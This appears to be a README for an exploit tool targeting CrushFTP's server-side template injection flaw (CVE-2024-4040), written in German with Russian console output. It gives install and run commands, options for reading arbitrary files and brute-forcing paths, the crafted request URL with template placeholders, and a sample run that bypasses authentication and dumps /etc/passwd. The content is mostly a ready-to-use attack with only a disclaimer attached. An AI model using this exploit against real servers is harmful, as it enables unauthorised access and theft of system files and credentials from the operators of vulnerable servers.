
ist ein PoC für CVE-2024-4040 Tool zum Ausnutzen der SSTI-Schwachstelle in CrushFTP
GenCrushSSTIExploit ist ein PoC-Exploit-Tool, das auf die SSTI-Schwachstelle (Server-Side Template Injection) in CrushFTP CVE-2024-4040 abzielt. Dieses Tool demonstriert, wie diese Schwachstelle nur zu Bildungs- und ethischen Hacking-Zwecken ausgenutzt werden kann.
rich für eine schöne und gestaltete Konsolenausgabe.⚠️ Verwenden Sie dieses Tool verantwortungsbewusst! Es ist nur für Forschungs- und Bildungszwecke bestimmt. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
pip (Python-Paketinstallationsprogramm)git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <ZIEL_URL>
-t / --target: Gibt die Ziel-URL des anfälligen CrushFTP-Servers an.-l / --lfi: Lokales Datei-Einschließen. Gibt die Datei an, die extrahiert werden soll.-w / --wordlist: Gibt eine Wortliste zum Brute-Forcen von Dateipfaden an.python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...